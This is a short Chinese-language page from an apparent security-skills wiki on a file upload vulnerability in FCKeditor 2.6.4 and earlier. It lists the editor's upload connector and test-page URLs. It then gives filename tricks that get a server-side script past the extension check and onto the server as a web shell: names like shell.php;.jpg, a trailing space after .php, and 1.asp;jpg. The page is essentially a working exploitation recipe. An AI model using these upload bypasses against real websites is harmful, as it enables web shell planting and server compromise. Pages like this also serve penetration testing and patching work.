> For the complete documentation index, see [llms.txt](https://ninjia.gitbook.io/secskill/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ninjia.gitbook.io/secskill/web/edit/fckeditor/upload.md).

# 1.7.2.1 fckeditor<=2.6.4文件上传漏洞

## 上传地址

```
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
```

## 漏洞利用

我们上传的文件例如：shell.php.rar或shell.php;.jpg会变为shell\_php;.jpg这是新版FCK的变化。

提交1.php+空格 就可以绕过去所有的,

asp绕过：

上传asp凉凉，1.asp;.jpg凉凉，因为fck2.6.4版本会重命名为1\_asp;.jpg

上传1.asp;jpg上传成功

![](http://ww1.sinaimg.cn/large/0065jC22ly1g15v9nj0xqj30tt0ae74t.jpg)
